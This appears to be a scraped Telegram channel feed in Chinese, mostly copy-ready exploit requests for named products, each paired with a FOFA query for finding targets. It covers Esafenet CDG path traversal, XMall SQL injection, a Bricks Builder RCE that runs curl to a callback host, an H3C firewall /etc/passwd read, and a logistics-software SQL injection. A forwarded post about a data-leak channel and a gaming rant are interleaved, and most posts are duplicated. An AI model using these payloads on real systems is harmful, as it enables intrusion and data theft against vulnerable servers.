亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载
noscript="电子文档安全管理系统"
POST /CDGServer3/ClientAjax HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Connection: closeContent-Length: 102Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate, brcommand=downclientpak&InstallationPack=../../../../../../../../../../windows/win.ini&forward=index.jsp
noscript="电子文档安全管理系统"
POST /CDGServer3/ClientAjax HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Connection: closeContent-Length: 102Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate, brcommand=downclientpak&InstallationPack=../../../../../../../../../../windows/win.ini&forward=index.jsp
👍4
Forwarded from Sydney的自留地
《论查档骡子是怎么自我炒作的》
注:
频道是2024年2月4日建的,内容是2月8日发的,(在20日当天同时宣称频道已经交接了,见图2)然后20日开始发煽情小作文,同时通过B站视频出圈,喜提真人流量。(为什么说是15岁呢,因为有个社工库频道发了个户籍说是他,至于是不是真的,这也不重要,不过大家放心,这个我不会给画面的)
视频内容就和报菜名一样,一边念叨着泄露了什么一边给大家看看当时频道发的煽情小作文/发癫。
总结:
结语:
看个热闹就行,真花了U只能说你这是来TG交学费咯,现在那破频道疯狂转发各种查档广告呢。(图1)
眼巴巴的求压缩包密码还不如看看自己显卡性能够不够,看看能不能使用GPU跑一下密码,超过7天还跑不出那你就可以洗洗睡啦!
注:
暂时性的调查结果,随时可能会更新。
频道是2024年2月4日建的,内容是2月8日发的,(在20日当天同时宣称频道已经交接了,见图2)然后20日开始发煽情小作文,同时通过B站视频出圈,喜提真人流量。(为什么说是15岁呢,因为有个社工库频道发了个户籍说是他,至于是不是真的,这也不重要,不过大家放心,这个我不会给画面的)
视频内容就和报菜名一样,一边念叨着泄露了什么一边给大家看看当时频道发的煽情小作文/发癫。
总结:
数据是早就泛滥的
故事宛如刚编的
流量是真实引流的
收的U是货真价实的
结语:
看个热闹就行,真花了U只能说你这是来TG交学费咯,现在那破频道疯狂转发各种查档广告呢。(图1)
眼巴巴的求压缩包密码还不如看看自己显卡性能够不够,看看能不能使用GPU跑一下密码,超过7天还跑不出那你就可以洗洗睡啦!
Forwarded from Sydney的自留地
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
XMall 开源商城 SQL注入漏洞(CVE-2024-24112)
Fofa:app="XMall-后台管理系统"
GET /item/list?draw=1&order[0][column]=1&order[0][dir]=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search[value]=&search[regex]=false&cid=-1&_=1679041197136 HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=B37FC1C79B186EB92EE17EA23D316B09; Hm_lvt_90194188523e0a2d04ad3ad170c83f30=1708396293; Hm_lpvt_90194188523e0a2d04ad3ad170c83f30=1708396293Upgrade-Insecure-Requests: 1
Fofa:app="XMall-后台管理系统"
GET /item/list?draw=1&order[0][column]=1&order[0][dir]=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search[value]=&search[regex]=false&cid=-1&_=1679041197136 HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=B37FC1C79B186EB92EE17EA23D316B09; Hm_lvt_90194188523e0a2d04ad3ad170c83f30=1708396293; Hm_lpvt_90194188523e0a2d04ad3ad170c83f30=1708396293Upgrade-Insecure-Requests: 1
👍2
WordPress Bricks Builder远程命令执行漏洞(CVE-2024-25600)
fofa:body="/wp-content/themes/bricks/"
GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0Connection: closeAccept-Encoding: gzip, deflate
获取nonce值
第二步执行rce
POST /wp-json/bricks/v1/render_element HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0Connection: closeContent-Length: 401Content-Type: application/jsonAccept-Encoding: gzip, deflate{ "postId": "1", "nonce": "c5b5949**", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "ob_start();echo
fofa:body="/wp-content/themes/bricks/"
GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0Connection: closeAccept-Encoding: gzip, deflate
获取nonce值
第二步执行rce
POST /wp-json/bricks/v1/render_element HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0Connection: closeContent-Length: 401Content-Type: application/jsonAccept-Encoding: gzip, deflate{ "postId": "1", "nonce": "c5b5949**", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "ob_start();echo
curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro;$output=ob_get_contents();ob_end_clean();throw new Exception($output);", "objectType": "post" } } }}❤1
Media is too big
VIEW IN TELEGRAM
究极卡比
对面虚空平移双十字刀那么长的判定贴脸戳不掉血,然后莫名其妙挨延迟刀离着十万八千里框框挨打跟特么闹鬼一样
这特么能被反杀了气得我今天晚上觉都睡不着了
对面虚空平移双十字刀那么长的判定贴脸戳不掉血,然后莫名其妙挨延迟刀离着十万八千里框框挨打跟特么闹鬼一样
这特么能被反杀了气得我今天晚上觉都睡不着了
H3C下一代防火墙任意文件读取漏洞
product="H3C-下一代防火墙"
/webui/?g=sys_corefile_sysinfo_download&file_name=../../../etc/passwd
product="H3C-下一代防火墙"
/webui/?g=sys_corefile_sysinfo_download&file_name=../../../etc/passwd
东胜物流软件-SaveUserQuerySetting接口存在SQL注入漏洞
POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-input
POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-input
❤1
